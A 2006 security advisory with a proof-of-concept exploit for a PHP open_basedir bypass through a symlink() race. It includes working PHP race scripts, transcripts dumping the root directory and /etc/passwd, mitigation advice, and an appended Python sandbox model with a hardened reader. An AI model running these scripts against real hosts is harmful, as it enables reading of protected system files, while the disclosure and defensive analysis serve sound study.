
nst-php-openbasedir.txt

Posted on 10 October 2006

/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST] - Advisory #26 - 09/10/06
--------------------------------------------------------
Program: PHP
Homepage: http://www.php.net
Vulnerable Versions: PHP 3, 4, 5
Risk: High!
Impact: Critical Risk

-==PHP open_basedir with symlink() function Race Condition PoC exploit==-
---------------------------------------------------------

- Description
---------------------------------------------------------
PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML.

- Tested
---------------------------------------------------------
localhost - PHP 5.0.4

- Vulnerability Description
---------------------------------------------------------

The vulnerability was discovered by the staff of Hardened-PHP (www.hardened-php.net). The original advisory is at
http://www.hardened-php.net/advisory_082006.132.html

The point is not quite what the Hardened-PHP advisory says:

"The first script alternates a symbolic link between a file that
is allowed and the one that is forbidden by open_basedir and the
second script simply puts loops around operations trying to
operate on the symbolic link."

We do not need to alternate the symlink between an allowed file and a forbidden one. In this PoC the symlink never points to an allowed file inside the loop: "xxx" is created once and never changed, and only the inner link "dummy" is toggled between absent and ".". While "dummy" is absent, "xxx" is a dangling link whose target cannot be resolved; while "dummy" points to ".", the kernel resolves "xxx" to "/". The open_basedir check and the actual open are two separate path resolutions, so a request whose check lands in the first state and whose open lands in the second gets through. The "a/a/a/a/a/a/" directory chain exists only so that, while "dummy" points at it, the target "dummy/../../../../../../" resolves back to the script's own directory and symlink() accepts it when "xxx" is created.

script1.php
<?php
   // "dummy" temporarily points into the directory chain so that the target of
   // "xxx" resolves inside the allowed directory while "xxx" is being created
   symlink("a/a/a/a/a/a/", "dummy");
   symlink("dummy/../../../../../../", "xxx");
   unlink("dummy");
   // from here on "xxx" is never touched; only "dummy" flips between absent and "."
   while (1) {
       symlink(".", "dummy");
       unlink("dummy");
   }
?>

script2.php
<?php
// the open_basedir restriction does not let us see the root dir content
@print_r(scandir("/"));
// scandir() is a PHP 5 function; on other versions use another function to
// work on the directory
while (1) {
    $dir = @scandir("xxx");
    if (@count($dir) > 20) print_r($dir); // the root dir has more than 20 entries
}
?>

(The copy of script2.php that produced the transcript below also called file_get_contents("/etc/passwd") on its second line, which is why warnings for that call appear; the listing above omits it. Each warning appears twice because the CLI both logs errors to stderr and displays them on stdout.)

--Real Proof of Concept exploit--
[root@fc43035 race_condition]# php script1.php &
[1] 7942
PHP Warning:  Module 'gd' already loaded in Unknown on line 0
[root@fc43035 race_condition]# php script2.php
PHP Warning:  Module 'gd' already loaded in Unknown on line 0
PHP Warning:  file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2

Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2
PHP Warning:  file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2

Warning: file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2
PHP Warning:  scandir(): open_basedir restriction in effect. File(/) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 3

Warning: scandir(): open_basedir restriction in effect. File(/) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 3
PHP Warning:  scandir(/): failed to open dir: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3

Warning: scandir(/): failed to open dir: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3
PHP Warning:  scandir(): (errno 1): Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3

Warning: scandir(): (errno 1): Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3
Array
(
    [0] => .
    [1] => ..
    [2] => .autofsck
    [3] => .autorelabel
    [4] => bin
    [5] => boot
    [6] => chroot
    [7] => dev
    [8] => etc
    [9] => home
    [10] => lib
    [11] => lib64
    [12] => lost+found
    [13] => media
    [14] => misc
    [15] => mnt
    [16] => net
    [17] => opt
    [18] => proc
    [19] => root
    [20] => sbin
    [21] => selinux
    [22] => srv
    [23] => sys
    [24] => tmp
    [25] => usr
    [26] => var
)
Array
(
    [0] => .
    [1] => ..
    [2] => .autofsck
    [3] => .autorelabel
    [4] => bin
    [5] => boot
    [6] => chroot
    [7] => dev
    [8] => etc
    [9] => home
    [10] => lib
    [11] => lib64
    [12] => lost+found
    [13] => media
    [14] => misc
    [15] => mnt
    [16] => net
    [17] => opt
    [18] => proc
    [19] => root
    [20] => sbin
    [21] => selinux
    [22] => srv
    [23] => sys
    [24] => tmp
    [25] => usr
    [26] => var
)

[root@fc43035 race_condition]#
--Real Proof of Concept exploit--

We have bypassed the open_basedir restriction and read the root directory listing. We can also read a file, for example /etc/passwd.

In the third line of script1.php the symbolic link is made to "dummy/../../../../../../etc/passwd", which resolves to ./etc/passwd while "dummy" points at the directory chain, so we have to create a folder named "etc" with a file named "passwd" inside:

[root@fc43035 race_condition]# ls
a  etc  script1.php  script2.php  script.php
[root@fc43035 race_condition]# cd etc
[root@fc43035 etc]# ls
passwd
[root@fc43035 etc]# cd ..
[root@fc43035 race_condition]#

script1.php is then the same as the first one; we only change the symbolic link target to "dummy/../../../../../../etc/passwd". In script2.php we try to read the file (the "xxx" link) with the file_get_contents() function.

script1.php
<?php
   // same as before, but "xxx" now resolves to /etc/passwd while "dummy" is "."
   symlink("a/a/a/a/a/a/", "dummy");
   symlink("dummy/../../../../../../etc/passwd", "xxx");
   unlink("dummy");
   while (1) {
       symlink(".", "dummy");
       unlink("dummy");
   }
?>

script2.php
<?php
// keep reading through the link; a read whose check and open fall on
// different sides of the flip returns the real /etc/passwd
while (1) {
    print @file_get_contents("xxx");
}
?>

--Real Proof of Concept exploit--
[root@fc43035 race_condition]# php script1.php &
[1] 9979
PHP Warning:  Module 'gd' already loaded in Unknown on line 0
[root@fc43035 race_condition]# php script2.php
PHP Warning:  Module 'gd' already loaded in Unknown on line 0
PHP Warning:  file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2

Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2
PHP Warning:  file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2

Warning: file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
apache:x:48:48:Apache:/var/wwww/htdocs:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
ftp:x:22222:0:root:/root:/bin/false
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
apache:x:48:48:Apache:/var/wwww/htdocs:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
ftp:x:22222:0:root:/root:/bin/false
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash

--Real Proof of Concept exploit--

You can see that /etc/passwd is read twice here, and many more times if we do not stop the script.

- How to fix it? More information?
--------------------------------------------------------
As the Hardened-PHP staff said, you have to disallow the use of the symlink() function.
You can do this with the disable_functions directive in your PHP configuration (php.ini by default). The directive is a comma-separated list and is PHP_INI_SYSTEM, so it can only be set in php.ini or the web server's php_admin_value, not in .htaccess or with ini_set():

disable_functions = ...,symlink

Note that this only removes PHP's own way of creating the links: on a shared host, symlinks created by any other route (FTP, a shell, another scripting language) give the same race, and open_basedir is a check PHP performs on path strings, not an operating-system boundary. Running each site under its own system user with filesystem permissions is the robust fix.

- References
--------------------------------------------------------
http://www.neosecurityteam.net/index.php?action=advisories&id=26
http://www.hardened-php.net/advisory_082006.132.html

- Credits
--------------------------------------------------------
Proof of Concept exploit by Paisterist -> paisterist.nst [at] gmail [dot] com
Vulnerability discovered by Hardened-PHP staff (http://www.hardened-php.net)

[N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/

- Greets
--------------------------------------------------------
HaCkZaTaN
K4P0
Daemon21
Link
0m3gA_x
LINUX
nitrous
m0rpheus
nikyt0x
KingMetal

Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@ @@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@

/* EOF */
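The race in the advisory above (two independent path resolutions, one for the open_basedir check and one for the open, with only the inner link "dummy" flipping) is played out below as an added example; it is not part of the advisory and not PHP's code. It is in Python rather than PHP because the hardened half needs openat-style calls (os.open with dir_fd and O_NOFOLLOW) that PHP does not expose. Everything in it is constructed: the temp-dir layout mirrors the PoC with a one-level chain instead of a/a/a/a/a/a, SECRET stands in for /etc/passwd, and check_open_basedir() is this example's own model of a resolve-then-compare check (an assumption, not PHP's implementation). It needs Linux or macOS.

```python
import os
import shutil
import tempfile

SECRET = b"root:x:0:0:root:/root:/bin/bash\n"  # constructed stand-in for /etc/passwd


def build_sandbox():
    """Mirror the PoC under a temp dir (constructed data, one-level chain):
    <tmp>/secret.txt is outside the allowed dir; <tmp>/allowed/a/ stands in for
    a/a/a/a/a/a; <tmp>/allowed/secret.txt is the decoy (the PoC's local etc/passwd);
    allowed/xxx -> dummy/../secret.txt is created once and never changed."""
    tmp = os.path.realpath(tempfile.mkdtemp(prefix="obd_race_"))
    base = os.path.join(tmp, "allowed")
    os.makedirs(os.path.join(base, "a"))
    with open(os.path.join(tmp, "secret.txt"), "wb") as f:
        f.write(SECRET)
    with open(os.path.join(base, "secret.txt"), "wb") as f:
        f.write(b"decoy\n")
    # While dummy -> a, the target of xxx resolves to allowed/secret.txt, i.e.
    # inside base: that is what lets xxx be created under a resolve-based check.
    os.symlink("a", os.path.join(base, "dummy"))
    os.symlink("dummy/../secret.txt", os.path.join(base, "xxx"))
    os.unlink(os.path.join(base, "dummy"))
    return tmp, base


def set_dummy(base, target):
    """script1's loop: None removes the inner link, a string re-points it."""
    p = os.path.join(base, "dummy")
    if os.path.lexists(p):
        os.unlink(p)
    if target is not None:
        os.symlink(target, p)


def check_open_basedir(path, base):
    """This example's model of a path-string check (assumption, not PHP's code):
    resolve, then require the result under base. os.path.realpath() is non-strict:
    a dangling component is kept literally and the '..' after it is collapsed
    lexically, so the dangling state resolves INSIDE base and passes."""
    resolved = os.path.realpath(path)
    return resolved == base or resolved.startswith(base + os.sep)


def vulnerable_read(path, base):
    """Check by path, then open by path: two independent path walks."""
    if not check_open_basedir(path, base):
        raise PermissionError("open_basedir restriction in effect")
    with open(path, "rb") as f:
        return f.read()


def outcome(fn, *args):
    """Return fn(*args), or the name of the OSError (sub)class it raised."""
    try:
        return fn(*args)
    except OSError as e:
        return type(e).__name__


def open_under(base, relpath, flags=os.O_RDONLY):
    """Hardened open: walk relpath one component at a time from a handle on base,
    refusing absolute paths, '..' and every symlink (O_NOFOLLOW), so the file
    that ends up open is exactly the file that was checked."""
    parts = [p for p in relpath.split("/") if p not in ("", ".")]
    if relpath.startswith("/") or ".." in parts or not parts:
        raise PermissionError("path escapes base")
    fd = os.open(base, os.O_RDONLY | os.O_DIRECTORY)
    try:
        for i, name in enumerate(parts):
            oflags = flags if i == len(parts) - 1 else os.O_RDONLY | os.O_DIRECTORY
            nfd = os.open(name, oflags | os.O_NOFOLLOW, dir_fd=fd)
            os.close(fd)
            fd = nfd
    except OSError:
        os.close(fd)
        raise
    return fd


def hardened_read(base, relpath):
    with os.fdopen(open_under(base, relpath), "rb") as f:
        return f.read()


def demonstrate():
    """Play the race out as explicit states; return what each call saw."""
    tmp, base = build_sandbox()
    xxx = os.path.join(base, "xxx")
    r = {}
    try:
        set_dummy(base, None)                                # state A: xxx dangling
        r["check_A"] = check_open_basedir(xxx, base)         # True
        r["A_alone"] = outcome(vulnerable_read, xxx, base)   # FileNotFoundError
        set_dummy(base, ".")                                 # state B: xxx -> <tmp>/secret.txt
        r["check_B"] = check_open_basedir(xxx, base)         # False
        r["B_alone"] = outcome(vulnerable_read, xxx, base)   # PermissionError
        # The leak: check half in A, script1 flips to B, open half in B.
        # script2's while(1) simply retries until that interleaving lands.
        set_dummy(base, None)
        if check_open_basedir(xxx, base):
            set_dummy(base, ".")
            with open(xxx, "rb") as f:
                r["leaked"] = f.read()                       # == SECRET
        for state in (None, "."):                            # hardened: refused in both
            set_dummy(base, state)
            r["hardened_%s" % state] = outcome(hardened_read, base, "xxx")
        r["hardened_decoy"] = hardened_read(base, "secret.txt")  # plain file is fine
    finally:
        shutil.rmtree(tmp)
    return r


if __name__ == "__main__":
    print(demonstrate())
```

Neither state leaks on its own: in state A the check passes but the open fails with ENOENT, in state B the check refuses; only a call whose check runs in A and whose open runs in B returns SECRET, which is all script1's flip loop and script2's retry loop are doing. open_under() closes that window by never following a symlink at all, so it refuses "xxx" in both states; the trade-off is that legitimate symlinks inside the base are rejected too and have to be replaced by real paths.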

 
